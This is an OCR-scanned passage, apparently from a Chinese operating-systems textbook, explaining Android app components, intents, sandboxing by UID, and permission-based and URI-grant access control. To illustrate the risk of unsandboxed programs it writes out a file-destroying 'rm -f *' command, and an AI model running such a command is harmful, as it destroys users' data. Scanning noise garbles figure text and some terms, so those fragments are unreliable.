ComposeActivity。 对 于 用 户 来 说 ， 这 些 仍然 是 同一 个 连贯 的 任务 ， 即 当前 与 之 交互 的 用 来 发 送 照片 的 相机 应 用 程序 。 

4) 新 的 ComposeActivity 被 置顶 ， 因 此 它 被 恢复 ;之 前 的 CameraMainActivity 不 再 置顶 ， 因 此 它 的 状 
态 被 保存 。 如 果 其 他 地 方 需要 它 的 RAM， 在 此 时 我 们 可 以 安全 地 退出 这 一 进程 。 
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图 10-55 通过 电子 邮件 应 用 程序 分 享 一 张 相机 照片 


最 后 ， 让 我 们 看 看 如 果 用 户 在 最 后 一 个 状态 〈 即 撰写 电子 邮件 来 分 享 照片 ) 期 间 离开 相机 任务 返回 
到 电子 邮件 应 用 程序 ， 将 会 发 生 什 么 。 图 10-56 展 示 了 系统 将 处 于 的 新 状态 。 注 意 ， 我 们 已 经 将 电子 邮 
件 任务 的 主 活动 返回 到 前 台 。 这 使 得 MailMainActivity 成 为 前 台 活 动 ， 但 是 目前 还 没有 任何 实例 在 应 用 
程序 的 进程 中 运行 。 
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图 10-56 返回 电子 邮件 应 用 程序 
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要 返回 到 之 前 的 活动 ， 系 统 将 创建 一 个 新 的 实例 ， 将 其 返回 到 旧 实 例 之 前 所 保存 的 状态 。 将 活动 从 
它 的 保存 状态 恢复 的 操作 必须 能 够 将 活动 返回 到 与 用 户 上 次 离开 时 相同 的 可 视 状 态 。 为 了 实现 这 一 点 ， 
应 用 程序 将 查看 用 户 之 前 消息 的 保存 状态 ， 从 其 永久 存储 器 中 加 载 该 消息 ， 然 后 将 滚动 状态 以 及 保存 的 
其 他 用 户 界面 状态 还 原 。 

2. 服务 

服务 (service) 有 两 种 不 同 的 身份 : 

1) 它 可 以 是 一 个 自 包含 的 长 期 运行 的 后 台 操作 。 以 这 种 方式 提供 服务 的 常见 例子 是 重复 播放 后 台 音 
乐 ， 在 用 户 使 用 其 他 应 用 时 维持 主动 的 网 络 连接 〈 例 如 与 IRC 服 务 器 ) ， 在 后 台 下 载 或 上 传 数 据 等 。 

2) 它 可 以 作为 其 他 应 用 或 者 系统 与 当前 应 用 程序 发 生 丰富 交互 的 连接 点 。 这 可 以 被 应 用 程序 用 来 为 
其 他 程序 提供 安全 的 API， 例 如 执行 图 像 或 者 音频 的 处 理 、 提 供 文本 到 语音 的 转换 等 。 

图 10-51 示 例 的 电子 邮件 清单 包含 了 一 个 用 于 执行 用 户 的 邮箱 同步 的 服务 。 常 用 的 实现 是 将 调度 服 
务 以 规则 的 间隔 (例如 每 15 分 钟 ) 运行 ， 到 达 时 间 点 时 启动 服务 ， 任 务 完成 后 关闭 。 

这 是 典型 的 第 一 种 服务 类 型 的 应 用 ， 即 一 个 长 期 运行 的 后 台 操作 。 图 10-57 显 示 了 这 种 情况 下 系统 的 
状态 ， 它 是 相当 简单 的 。 活 动 管理 器 创建 了 一 个 ServiceRecord 来 跟踪 服务 ， 注 意 它 已 经 被 启动 了 ， 因 此 
在 应 用 程序 的 进程 中 创建 了 它 的 SyncService 实 例 。 在 这 种 状态 下 ， 服 务 是 完全 活跃 的 (禁止 整个 系统 进 
和 睡眠， 如 果 不 带 唤 醒 锁 的 话 ) ， 而 且 可 以 自由 地 做 任何 它 想 要 做 的 事情 。 在 这 种 状态 下 ， 应 用 程序 可 能 
会 消失 ， 例 如 进程 崩溃 ， 但 是 活动 管理 器 将 继续 维护 其 ServiceRecord， 并 且 可 以 决定 在 需要 时 重启 服务 。 
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图 10-57 开启 应 用 服务 


要 了 解 如 何 使 用 服务 作为 与 其 他 应 用 程序 交互 的 连接 
点 ， 我 们 假设 要 将 现 有 的 SyncService 扩 展 为 允许 其 他 应 用 程 





package com.example.email 


序 控 制 其 同步 间隔 的 API。 我 们 需要 为 这 个 API 定 义 一 个 | interface Aae onto 
AIDL 接 口 ， 如 图 10-58 所 示 。 void setSyncinterval(int seconds); 


为 了 使 用 这 个 API， 另 一 个 进程 可 以 绑 定 到 我 们 的 应 用 } 
程序 服务 中 ， 以 获得 其 访问 的 接口 。 这 将 在 两 个 应 用 程序 
之 间 创 建 一 个 连接 ， 如 图 10-59 所 示 。 此 过 程 的 步骤 如 下 : 图 10-58 控制 同步 服务 的 同步 间隔 的 接口 

1) 客户 端 应 用 程序 告诉 活动 管理 器 它 想 要 绑 定 到 某 个 
服务 。 

2) 如 果 该 服务 尚未 创建 ， 活 动 管理 器 将 在 服务 应 用 程序 的 进程 中 创建 它 。 

3) 该 服务 将 其 接口 的 IBinder 返 回 到 活动 管理 器 ， 活 动 管理 器 现在 将 IBinder 保 存在 其 ServiceRecord 中 。 

4) 现在 活动 管理 器 有 了 服务 端的 IBinder， 可 以 将 其 发 送 回 原始 客户 端 应 用 程序 。 

5) 现在 有 了 服务 端的 IBinder 的 客户 端 应 用 程序 可 以 在 其 接口 上 进行 任何 直接 呼叫 。 

3. 接收 器 

接收 器 (receiver) 是 发 生 的 〈 通 常 是 外 部 的 ) 事件 的 接收 者 ， 这 些 事件 一 般 发 生 在 后 台 和 正常 的 
用 户 交 互 之 外 。 接 收 器 在 概念 上 与 明确 注册 的 在 感 兴趣 事件 (例如 报警 关闭 、 数 据 连 接 更 改 等 ) 发 生 时 
可 回调 的 应 用 程序 相同 ， 但 是 不 需要 应 用 程序 一 直 运 行 以 接收 事件 。 

图 10-51 的 电子 邮件 示例 清单 包含 了 一 个 接收 器 ， 它 可 以 让 应 用 程序 发 现 设 备 的 存储 空间 何 时 变 得 
过 低 ， 以 便 停 止 同 步 电 子 邮 件 (同步 可 能 会 占用 更 多 的 存储 空间 )。 当 设备 的 存储 空间 变 得 过 低 时 ， 系 
统 会 发 送 具 有 低 存储 代码 的 广播 ， 以 便 传送 给 所 有 对 这 一 事件 感 兴趣 的 接收 器 。 
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客户 App 进 程 
图 10-59 绑 定 到 应 用 程序 服务 


图 10-60 说 明了 活动 管理 器 是 怎样 处 理 这 种 广播 ， 以 将 其 传递 到 所 有 感 兴趣 的 接收 器 的 。 它 首先 向 
包 管 理 器 请 求 一 个 包含 所 有 对 这 一 事件 感 兴趣 的 接收 器 的 列表 ， 该 列表 放置 在 代表 该 广播 的 
BroadcastRecord 中 。 活 动 管理 器 然后 遍历 列表 中 的 每 个 条 目 ， 使 每 个 相关 的 应 用 程序 的 进程 创建 并 执行 
相应 的 接收 器 类 。 
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图 10-60 发 送 一 个 广播 到 应 用 接收 器 


接收 器 仅 作 为 一 次 性 操作 运行 。 当 事件 发 生 时 ， 系 统 找 到 对 其 感 兴趣 的 接收 器 ， 将 该 事件 递送 给 它 
们 ， 一旦 这 些 接 收 器 处 理 了 该 事件 ， 它 们 也 就 完结 了 。 没 有 类 似 我 们 已 看 到 的 其 他 应 用 程序 组 件 的 
ReceiverRecord， 因 为 特定 的 接收 器 在 单个 广播 的 持续 时 间 内 只 是 一 个 暂时 的 实体 。 每 当 向 接收 器 组 件 
发 送 新 的 广播 时 ， 就 创建 该 接收 器 类 的 新 实例 。 

4. 内 容 提供 器 

我 们 的 最 后 一 个 应 用 程序 组 件 内 容 提供 器 (content provider) ， 是 应 用 程序 之 间 彼 此 交换 数据 的 主 
要 机 制 。 与 内 容 提供 器 之 间 的 所 有 交互 都 是 通过 “content: 主题 ”这 种 URI 完 成 的 ，URI 的 权限 是 用 来 
找到 正确 的 可 交互 的 内 容 提供 器 。 

例如 ， 在 图 10-51 的 电子 邮件 应 用 程序 中 ， 内 容 提 供 器 指出 其 权限 是 com.example.email. 
provider.email。 因 此 在 此 内 容 提供 器 上 的 URI 操 作 将 这 样 开始 


content://com.example.email.provider.email/ 


该 URI 的 前 级 由 内 容 提供 器 自身 来 解析 ， 用 以 确定 其 中 的 哪些 数据 将 要 被 访问 。 在 这 个 例子 中 ,一 
个 常见 的 约定 是 URI 
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content://com.example.email.provider.email/messages 


代表 所 有 的 电子 邮件 的 列表 ， 而 

content://com.example.email.provider.email/messages/1 
提供 对 键 值 为 1 的 单条 信息 的 访问 。 

为 了 与 内 容 提供 器 交互 ， 应 用 程序 通常 通过 一 个 称 为 ContentResolver 的 系统 API 来 实现 ， 其 中 的 大 
部 分 方法 都 有 一 个 初始 的 用 以 指定 要 操作 的 数据 的 URI 参 数 。 最 常用 的 ContentResolver 方 法 之 一 是 query， 
它 对 给 定 的 URI 执 行 数据 库 查询 ， 并 返回 一 个 Cursor 用 于 检索 结构 化 的 结果 。 例 如 ， 检 索 所 有 可 用 电子 
邮件 的 概览 类 似 如 下 的 形式 : 


query("content://com.example.email.provider.email/messages") 


虽然 这 看 起 来 不 像 应 用 程序 ， 但 是 当 它们 使 用 内 容 提 供 器 时 所 发 生 的 事情 与 绑 定 到 服务 器 上 有 很 多 
相似 之 处 。 图 10-61 说 明了 系统 是 如 何 处 理 我 们 的 查询 示例 的 。 

1) 应 用 程序 调用 ContentResolver.query 来 启动 查询 操作 。 

2) URI 的 权限 交 到 活动 管理 器 ， 以 便 活 动 管理 器 (通过 包 管 理 器 ) 找到 相应 的 内 容 提 供 器 。 

3) 如 果 相 应 的 内 容 提 供 器 尚未 运行 ， 则 会 创建 它 。 

4) 一 旦 创建 ， 内 容 提供 器 将 其 实现 系统 IContentProvider 接 口 的 IBinder 返 回 给 活动 管理 器 。 

5) 返回 内 容 提 供 器 的 IBinder 到 ContentResolver。 

6) 内 容 解 析 器 现在 可 以 通过 在 AIDL 接 口上 调用 相应 的 方法 来 完成 初始 的 查询 操作 ， 并 返回 Cursor 


system_server 进 程 中 的 活动 管理 器 电子 邮件 App 进 程 


ProviderRecord 
(EmailProvider) 





客户 App 进 程 


图 10-61 与 内 容 提供 器 交互 


内 容 提供 器 是 执行 跨 应 用 交互 的 关键 机 制 之 一 。 例 如 ， 如 果 我 们 回 到 之 前 的 图 10-55 中 描述 的 跨 应 
用 分 享 系统 ， 内 容 提 供 器 是 数据 实际 传输 的 方式 。 此 操作 的 完整 流程 为 : 

1) 创建 包含 待 分 享 数据 的 URI 的 分 享 请 求 ， 并 将 其 提交 给 系统 。 

2) 系统 向 ContentResolver 询 问 该 URI 对 应 的 数据 的 MIME 类 型 。 这 与 我 们 刚刚 讨论 的 query 方 法 非常 
类 似 ， 但 是 只 要 求 内 容 提供 器 返回 一 个 关于 URI 的 MIME 类 型 的 字符 串 。 

3) 系统 查找 所 有 可 以 接受 标识 为 该 MIME 类 型 的 数据 的 活动 。 

4) 显示 一 个 用 户 界面 ， 以 便 用 户 从 可 能 的 接收 者 中 选择 一 个 。 

5) 当 一 个 活动 被 选中 后 ， 系 统 启动 它 。 

6) 分 享 处 理 活动 接收 要 分 享 的 数据 的 URI， 通 过 ContentResolver 检 索 其 数据 ， 并 执行 其 相应 的 操作 ， 
创建 邮件 ， 存 储 邮 件 ， 等 等 。 


108.9 意图 

我 们 尚未 在 图 10-51 所 示 的 应 用 程序 清单 中 讨论 的 一 个 细节 ， 是 <intent-filter> 标 签 及 包含 它 的 活动 
和 接收 器 的 声明 。 这 是 Android 的 意图 (intent) 功能 的 一 部 分 ， 也 是 不 同 应 用 程序 之 间 能 够 互相 识别 以 
便 进行 交互 和 协同 工作 的 基础 。 

意图 是 Android 用 来 发 现 和 识别 活动 、 接 收 器 和 服务 的 机 制 。 它 在 某 些 方面 与 Linux shell 的 搜索 路 径 
比较 相似 。 利 用 搜索 路 径 ，shell 在 多 个 可 能 的 目录 中 进行 搜索 ， 寻 找 与 传 给 它 的 命令 名 相 匹 配 的 可 执行 
文件 。 

意图 主要 分 两 种 : 显 式 意 图 和 隐 式 意图 。 显 式 意图 (explicit intent) 直接 指定 一 个 准确 的 应 用 程序 
组 件 ， 相 当 于 在 Linux shell 中 给 一 条 指令 提供 一 条 绝对 路 径 。 对 于 显 式 意图 ， 最 重要 的 是 两 个 用 来 命名 
组 件 的 字符 串 : 目标 应 用 程序 的 封装 名 ， 以 及 该 应 用 程序 中 组 件 的 类 名 。 参 照 图 10-51 所 示 应 用 程序 和 
图 10-52 所 示 的 活动 ， 该 组 件 中 就 包含 一 个 封装 名 为 com.example.email、 类 名 为 com.example.email. 
MailMainActicity 的 显 式 意图 。 

用 一 个 显 式 意 图 的 封装 名 和 类 名 就 能 获得 足够 信息 来 识别 唯一 的 目标 组 件 ， 例 如 图 10-52 中 的 主 邮 
件 活 动 。 封 装 管理 器 可 以 通过 封装 名 来 返回 应 用 程序 需要 的 任何 信息 ， 例 如 源码 位 置 等 。 通 过 类 名 ， 可 
以 得 知 需要 执行 的 是 哪 部 分 源码 。 

隐 式 意图 (implict intent) 描述 所 需 组 件 的 特点 ， 而 并 不 直接 指向 该 组 件 。 这 相当 于 在 Linux shell 
中 ， 给 shell 提 供 一 条 指令 名 ， 随 后 shell 使 用 搜索 路 径 来 寻找 一 条 待 运行 的 具体 指令 。 这 个 寻找 与 隐 式 意 
图 相 匹配 的 组 件 的 过 程 叫 作 意 图 解析 (intent resolution) 。 

Android 的 通用 共享 功能 就 是 隐 式 意图 的 一 个 典型 例子 。 如 图 10-55 中 所 示 ， 用 户 通过 邮件 应 用 程序 
来 分 享 由 相机 拍摄 的 照片 。 此 处 ， 相 机 应 用 生成 一 条 意图 ， 描 述 了 需要 完成 怎样 的 操作 ， 随 后 系统 找到 
所 有 可 能 完成 这 一 操作 的 活动 。 意 图 android.intent.action.SEND 发 起 了 一 个 分 享 操作 的 要 求 ， 然 后 如 图 
10-51 所 示 ， 邮 件 应 用 程序 的 compose 活 动 声明 了 它 能 够 进行 这 个 操作 。 

意图 解析 有 三 个 可 能 的 结果 : (1) 没有 找到 匹配 的 活动 ，(2) 仅 找 到 一 个 匹配 的 活动 ，(3) 找到 了 
多 个 能 够 处 理 该 意图 的 活动 。 空 的 匹配 会 导致 空 的 结果 或 者 一 个 异常 ， 这 取决 于 调用 者 在 该 处 的 期 望 返 
回 类 型 。 如 果 仅 有 一 个 匹配 结果 ， 系 统 会 立即 执行 这 个 意图 ， 此 时 它 已 转 为 显 式 意 图 。 如 果 有 多 个 匹配 
结果 ， 则 需要 寻找 其 他 解析 方法 ， 使 得 结果 唯一 。 

如 果 一 个 意图 被 解析 为 多 个 可 能 的 活动 ， 则 不 能 同时 执行 它们 ， 而 是 需要 挑选 一 个 执行 。 这 个 过 程 
在 封装 管理 器 中 实现 。 如 果 封 装 管理 器 需要 将 一 个 意图 解析 为 一 个 活动 ， 而 它 发 现 有 多 个 匹配 的 活动 ， 
那么 它 将 把 这 个 意图 解析 为 一 个 搭建 在 系统 中 的 名 为 ResolverActivity 的 特殊 活动 。 这 个 活动 在 执行 时 
会 向 封装 管理 器 请 求 该 意图 所 对 应 的 匹配 活动 列表 ， 显 示 给 用 户 并 要 求 用 户 选择 其 中 一 个 。 做 出 选择 之 
后 ， 它 根据 原意 图 和 用 户 选择 的 活动 创建 一 个 新 的 显 式 意图 ， 通知 系 统 运行 该 活动 。 

Android 与 Linux shell 还 有 另 一 个 相似 之 处 ， 即 Android 的 图 形 界面 一 一 启动 器 ， 与 其 他 任何 应 用 程 
序 一 样 运行 在 用 户 空间 中 。Android 的 启动 器 可 以 调用 封装 管理 器 来 寻找 可 执行 的 活动 ， 在 用 户 做 出 选 
择 之 后 开始 执行 。 


10.8.10 ”应 用 程序 沙 箱 

作为 一 种 传统 ， 在 操作 系统 中 ， 应 用 程序 被 视 为 由 用 户 执行 的 一 些 代码 。 这 个 行为 是 从 命令 行 时 代 
继承 下 来 的 。 在 命令 行 中 ， 如 果 你 输入 ls 指令 ， 那 么 它 是 由 你 的 身份 (UID) 运行 的 ， 拥 有 和 你 相同 的 
系统 权限 。 同 样 ， 当 你 用 图 形 用 户 界面 来 运行 一 个 你 想 玩 的 游戏 时 ， 这 个 游戏 将 会 以 你 的 身份 运行 ， 可 
以 访问 你 的 文件 ， 包 括 很 多 它 其 实 并 不 需要 访问 的 东西 。 

然而 这 并 不 是 我 们 现在 使 用 计算 机 的 普遍 方式 。 我 们 会 运行 一 些 从 可 信 度 较 低 的 第 三 方 来 源 得 到 的 
应 用 程序 ， 其 功能 十 分 繁多 ， 我 们 很 难 控制 其 在 它们 自己 的 运行 环境 中 进行 的 诸多 种 类 的 大 量 操作 。 操 
作 系 统 支持 的 应 用 程序 模型 和 实际 使 用 的 应 用 程序 之 间 存在 着 不 一 致 的 现象 。 这 种 现象 可 以 用 一 些 策略 
来 缓和 ， 比 如 区 分 普通 用 户 和 “管理 员 ” 用 户 的 权限 ， 在 第 一 次 运行 某 个 应 用 程序 时 弹出 提醒 。 但 这 些 
策略 并 未 真正 指出 背后 的 这 些 不 一 致 的 现象 。 

换言之 ， 传 统 操 作 系统 善于 保护 一 个 用 户 不 受 其 他 用 户 的 影响 ， 而 并 不 擅长 保护 用 户 不 受 自己 的 影 
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响 。 所 有 的 程序 都 以 用 户 的 权限 运行 ， 如 果 他 们 产生 了 误 操 作 ， 则 会 带 来 用 户 可 能 造成 的 一 切 损 失 。 试 
想 ， 若 是 在 UNIX 环 境 中 ， 可 能 会 造成 多 大 的 损失 呢 ? 你 可 以 泄露 用 户 可 获取 的 一 切 信息 ， 你 可 以 运行 
rm -f *# 来 还 你 一 个 空 无 一 物 的 根 目录 。 而 且 假 使 程序 不 仅 是 有 错误 的 ， 而 且 是 恶意 的 ， 它 会 加 密 你 的 一 
切 文件 并 让 你 赎 回 它们 。 用 “你 的 权限 ”来 运行 一 切 程序 是 非常 危险 的 1 

Android 试 图 以 这 样 一 个 核心 前 提 来 处 理 这 个 问题 : 应 用 程序 其 实 是 由 其 开发 者 作为 一 个 访客 运行 
在 用 户 的 设备 上 的 。 因 此 ， 在 没有 得 到 用 户 的 确切 允许 之 前 ， 应 用 程序 在 接触 任何 敏感 信息 时 是 不 受信 
任 的 。 

在 Android 的 实现 中 ， 这 个 理念 通过 用 户 ID 相 当 直 接地 表达 出 来 。 当 安装 一 个 Android 应 用 程序 时 ， 
为 其 新 创造 一 个 独特 的 Linux 用 户 ID (也 称 UID)， 该 应 用 程序 的 所 有 源码 是 以 该 新 “用 户 ” 的 名 义 运行 
的 。 这 样 ，Linux 用 户 ID 为 每 个 应 用 程序 创造 一 个 沙 箱 ， 配 备 各 自 的 隔离 区 来 储存 文件 系统 ， 如 同 为 用 
户 在 桌面 系统 中 创造 沙 箱 一 样 。 换 言 之 ，Android 创 新 地 活用 了 Linux 中 已 有 的 一 个 功能 ， 造 成 了 隔离 性 
更 好 的 结果 。 


10.8.11 安全 性 

Android 的 应 用 程序 安全 性 围绕 着 UID 展 开 。 在 Linux 中 ， 每 个 进程 在 运行 时 拥有 一 个 独特 的 UID， 
Android 使 用 UID 来 识别 与 保护 安全 屏障 。 进 程 进行 交互 的 唯一 手段 是 利用 跨 进程 通信 (IPC) 机 制 ， 携 
带 足 以 使 它 识别 调用 者 的 信息 。 捆 绑 (binder) IPC 在 每 个 跨 进程 的 事务 中 明确 包含 了 这 些 信 息 ， 确 保 
IPC 的 接收 者 能 简单 地 请 求 调用 者 的 UID。 

Android 为 系统 底层 预先 定义 了 一 系列 标准 UID ， 但 大 多 数 应 用 程序 是 在 其 第 一 次 运行 或 安装 时 ， 




















从 “应 用 程序 UID” 范 围 中 获得 动态 分 配 的 UID 的 。 UDE T 7 
图 10-62 给 出 了 一 些 常用 UID 值 与 用 途 的 映射 。 小 于 0 根 

10000 的 UID 是 固定 分 配给 系统 的 ， 专 门 用 于 硬件 
或 系统 实现 的 具体 部 件 ， 这 里 列 出 了 一 些 典 型 UID |1001 电话 服务 

值 。 处 于 10000 一 19999 范 围 的 UID 是 在 应 用 程序 第 ”|1013 | 底层 媒体 进程 | 
一 次 安装 时 ， 由 封装 管理 器 动态 分 配给 应 用 程序 的 ， |2000 命令 行 界面 访问 | 


这 表示 一 个 系统 上 最 多 可 安装 10000 个 应 用 程序 。 OOOO = 19999 动态 分 配 应 用 程序 UID 
注意 从 100000 开 始 的 范围 是 用 来 实现 Android 的 传 2 多 用 户 由 此 开始 

统 多 用 户 模型 的 : 如 果 一 个 应 用 程序 自身 的 UID 是 图 10-62 Android 的 常用 UID 分 配 
10002， 那 么 当 第 二 个 用 户 运行 该 应 用 程序 时 ， 它 将 被 识别 为 110002。 

当 一 个 应 用 程序 首次 被 分 配 一 个 UID 时 ， 随 之 将 创造 一 个 新 的 存储 目录 ， 用 来 存储 这 个 UID 拥 有 的 
文件 。 应 用 程序 可 以 自由 访问 该 目录 中 它 的 私有 文件 ， 但 不 能 访问 其 他 应 用 程序 的 文件 。 反 过 来 ， 其 他 
应 用 程序 也 不 能 访问 它 的 文件 。 这 就 使 得 内 容 提供 器 变 得 十 分 重要 ， 在 前 面 关于 应 用 程序 的 音节 中 已 经 
讨论 过 ， 因 为 它们 是 能 在 应 用 程序 之 间 传递 信息 的 少数 几 个 机 制 之 一 。 

即使 拥有 UID 1000 的 系统 自身 也 不 能 访问 应 用 程序 拥有 的 文件 。 因 此 需要 守护 进程 installd， 它 拥 
有 特殊 权限 ， 运 行 时 可 以 在 其 他 应 用 程序 的 目录 中 访问 和 创建 文件 。Installd 进 程 向 封装 管理 器 提供 十 分 
有 限 的 应 用 程序 编程 接口 (API) ， 以 便 后 者 创建 和 管理 应 用 程序 需要 的 数据 目录 。 

在 一 般 状态 下 , Android 应 用 程序 沙 箱 必须 禁止 可 能 危害 相关 应 用 程序 安全 性 的 一 切 跨 应 用 程序 通信 。 
这 样 做 是 为 了 和 鲁 棱 性 (防止 一 个 应 用 程序 使 另 一 个 应 用 程序 崩溃 )， 但 更 多 是 为 了 维护 信息 访问 安全 。 

考虑 我 们 的 相机 应 用 程序 。 当 用 户 拍照 时 , 相机 应 用 程序 将 拍 到 的 图 片 存储 在 它 的 私有 数据 空间 内 ， 
任何 其 他 应 用 程序 都 不 能 访问 。 这 正 是 我 们 想 要 的 ， 因 为 图 片 可 能 包含 用 户 的 敏感 信息 。 

用 户 拍照 之 后 ， 她 可 能 想 要 发 送 给 一 位 朋友 。 电 子 邮件 是 另 一 个 独立 的 应 用 程序 ， 存 在 于 它 自己 的 
沙 箱 之 中 ， 无 权 访问 相机 应 用 程序 里 的 照片 。 那 么 如 何 让 电子 邮件 应 用 程序 能 够 访问 相机 应 用 程序 沙 箱 
里 的 照片 呢 ? 

Android 最 著名 的 访问 控制 形式 是 应 用 程序 权限 。 权 限 是 在 应 用 程序 安装 时 ， 赋 予 给 它 的 详细 定义 
的 权力 。 应 用 程序 列 出 它 需 要 的 权限 清单 ， 在 安装 之 前 通知 用 户 ， 使 用 户 得 知 应 用 程序 在 此 基础 上 可 进 
行 哪些 操作 。 
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图 10-63 展 示 了 电子 邮件 应 用 程序 如 何 使 用 权限 来 访问 相机 应 用 程序 中 的 图 片 。 在 此 例 中 ， 相 机 应 
用 程序 将 READ_PICTURES 权 限 与 它 内 部 的 图 片 关 联 ， 表 示 任 何 拥有 该 许可 的 应 用 程序 都 可 以 访问 它 的 
图 片 数 据 。 电 子 邮件 应 用 程序 在 它 的 清单 中 声明 需要 该 权限 。 这 样 ， 电 子 邮件 应 用 程序 就 可 以 访问 相机 
应 用 程序 拥有 的 一 个 资源 标识 符 (URI)， 即 content://pics/1。 一 旦 收 到 这 个 URI 请 求 ， 相 机 应 用 程序 的 
内 容 提 供 器 就 会 询问 封装 管理 器 ， 确 定 调用 者 是 否 拥 有 所 需 的 权限 。 如 果 拥 有 ， 则 调用 成 功 ， 合 适 的 数 
据 将 返回 到 应 用 程序 中 。 
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权限 并 不 是 绑 定 于 内 容 提 供 器 的 ， 任 何 指向 系统 内 的 IPC 都 受到 权限 的 保护 ， 因 为 系统 总 会 向 封装 
管理 器 询问 调用 者 是 否 拥 有 所 需 权 限 。 回 想 应 用 程序 沙 箱 是 基于 进程 和 UID 的 ， 因 此 安全 屏障 总 会 存在 
于 进程 的 边界 ， 而 许可 是 与 UID 相 关联 的 。 基 于 此 ， 在 收 到 关联 了 UID 的 IPC 时 ， 通 过 向 封装 管理 器 询问 
该 UID 是 否 已 拥有 相应 的 权限 ， 便 可 进行 权限 检查 。 例 如 ， 当 应 用 程序 需要 用 户 位 置信 息 时 ， 系 统 的 位 
置 管理 服务 会 要 求 访问 用 户 位 置 的 权限 。 

图 10-64 展 示 了 应 用 程序 未 拥有 其 需要 执行 的 操作 对 应 的 权限 时 的 情景 。 这 里 ， 浏 览 器 应 用 程序 正 
试图 直接 访问 用 户 的 图 片 ， 但 它 只 拥有 一 个 关于 互联 网 操作 的 权限 。 这 时 ，PicturesProvider 由 封装 管理 
器 得 知 调用 者 进程 并 未 拥有 所 需 的 READ_PICTURES 权 限 ， 结 果 会 向 调用 者 抛 出 一 个 安全 性 异常 。 
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权限 能 够 提供 对 于 操作 和 数据 类 的 广泛 、 无 限制 的 访问 。 在 应 用 程序 的 功能 是 围绕 着 这 些 操作 展开 
的 情况 下 ， 权 限 能 够 正常 工作 ， 例 如 我 们 的 电子 邮件 应 用 程序 要 求 INTERNET 许 可 来 收发 邮件 。 然 而 ， 
电子 邮件 应 用 程序 是 否 应 该 持 有 READ_PICTURES 权 限 呢 ? 电子 邮件 应 用 程序 并 不 直接 与 读 取 用 户 照 片 
的 功能 相关 ， 因 此 它 没有 理由 有 权限 访问 你 的 所 有 图 片 。 

这 便 是 使 用 权限 带 来 的 另 一 个 问题 ， 从 图 10-55 中 就 可 以 发 现 它 。 回 想 我 们 是 如 何 启 动 电子 邮件 应 
用 程序 的 ComposeActivity 来 通过 相机 应 用 程序 分 享 图 片 的 。 电子 邮件 应 用 程序 收 到 了 待 分 享 数据 的 URI， 
但 不 知道 它 从 何 而 来 一 一 在 该 图 中 自然 由 相机 而 来 ， 但 是 其 他 任何 应 用 程序 也 可 能 让 用 户 用 邮件 发 送 它 
们 的 数据 ， 例 如 音频 文件 、 文 本 文档 等 。 电 子 邮 件 应 用 程序 只 需 读 取 它 收 到 的 URI 比 特 流 ， 然 后 将 其 添 
加 为 一 个 附件 即 可 。 然 而 ， 引 入 权限 之 后 ， 它 则 需要 预先 给 所 有 可 能 要 求 发 送 邮件 的 应 用 程序 的 所 有 数 
据 类 型 指定 权限 。 

这 里 ， 有 两 个 问题 需要 解决 。 第 一 ， 我 们 不 希望 允许 应 用 程序 访问 他 们 并 不 实际 需要 的 大 量 数 据 。 
第 二 ， 需 要 人 允许 应 用 程序 访问 来 自任 何 源 的 数据 ， 包 括 那些 它们 没有 先 验 知识 的 数据 。 

这 里 需要 进行 一 项 重要 的 观察 : 用 电子 邮件 发 送 图 片 的 行为 ， 事 实 上 是 一 个 意图 明确 的 用 户 交 互 行 
为 一 一 用 一 个 特定 的 应 用 程序 发 送 一 幅 特定 的 图 片 。 只 要 操作 系统 参与 了 此 交互 行为 ， 这 项 观察 就 能 在 
两 个 应 用 程序 沙 箱 上 打开 洞口 ， 允 许 数据 的 传递 。 

Android 支 持 这 种 存在 于 意图 和 内 容 提供 器 之 间 的 隐 式 安全 数据 访问 。 图 10-65 展 示 了 在 我 们 用 电子 
邮件 发 送 图 片 的 例子 中 ， 这 种 访问 是 如 何 进行 的 。 左 下 角 的 相机 应 用 程序 创建 了 一 个 分 享 它 的 一 幅 图 片 
content://pics/1 的 意图 。 在 启动 先前 见 过 的 编写 邮件 应 用 程序 的 同时 ,“ 已 授权 URI” 列 表 中 也 增添 一 项 ， 
表示 新 的 ComposeActivity 现 已 获得 此 URI 的 访问 权限 。 当 ComposeActivity 试 图 访问 并 读 取 它 被 赋予 的 此 
URI 时 ， 照 相机 应 用 程序 中 拥有 图 片 资 料 的 PicturesProvider 则 会 向 封装 管理 器 询问 ， 调 用 者 邮件 应 用 程 
序 是 否 有 权 访 问 数据 ， 答 案 为 是 ， 于 是 图 片 返回 给 邮件 应 用 程序 。 
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图 10-65 用 内 容 提供 器 来 分 享 图 片 


这 种 细 粒 度 URI 访 问 控制 还 可 以 用 另 一 种 方式 来 进行 。 另 一 种 意图 行为 是 android_ 
intent_action.GET_CONTENT， 应 用 程序 可 以 使 用 它 来 让 用 户 选择 一 些 数据 并 返回 给 它 。 例 如 应 用 于 电 
子 邮 件 应 用 程序 中 ， 就 是 另 一 种 方向 的 操作 方法 : 用 户 在 邮件 应 用 程序 中 要 求 添加 一 个 附件 ， 这 将 在 相 
机 应 用 程序 中 启动 一 项 活动 ， 让 用 户 选 择 一 幅 图 片 。 

图 10-66 展 示 了 上 述 这 种 新 的 流程 。 除 去 两 个 应 用 程序 的 活动 的 组 合 方式 存在 不 同 之 外 ， 图 10-66 与 
图 10-65 几 平 完 全 相同 。 在 图 10-66 中 ， 图 片 选择 活动 由 邮件 应 用 程序 在 相机 应 用 程序 中 发 起 。 一 旦 图 片 
被 选 定 ， 其 URI 会 被 返回 到 邮件 应 用 程序 中 ， 这 时 此 URI 授 权 会 被 活动 管理 粥 记录 下 来 。 
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因为 这 种 方法 允许 系统 来 维护 每 个 应 用 程序 的 数据 的 严格 控制 ， 在 用 户 不 知情 的 情况 下 允许 所 需 数 
据 的 精确 访问 ， 因 而 它 是 十 分 强力 的 。 很 多 用 户 交 互 行为 也 从 中 受益 ， 如 用 拖 动 放下 来 创建 一 个 相似 的 
URI 授 权 。 但 Android 也 利用 其 他 信息 (如 窗口 焦点 )， 来 确定 应 用 程序 能 够 进行 何 种 交互 行为 。 
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图 10-66 用 内 容 提 供 器 来 添加 一 幅 图 片 


Android 使 用 的 最 后 一 种 常用 的 安全 性 措施 是 允许 /禁止 特定 类 型 访问 的 明确 用 户 界 面 。 这 种 措施 为 
应 用 程序 提供 了 一 些 方 式 ， 告 知 用 户 其 可 提供 一 些 功能 ， 并 通过 一 个 受 系 统 支 持 的 可 信任 用 户 界面 来 让 
用 户 控制 这 些 访问 权限 。 

这 种 措施 的 一 个 典型 例子 是 Android 的 输入 法 架构 。 输 入 法 是 一 种 由 第 三 方 应 用 程序 提供 的 服务 ， 
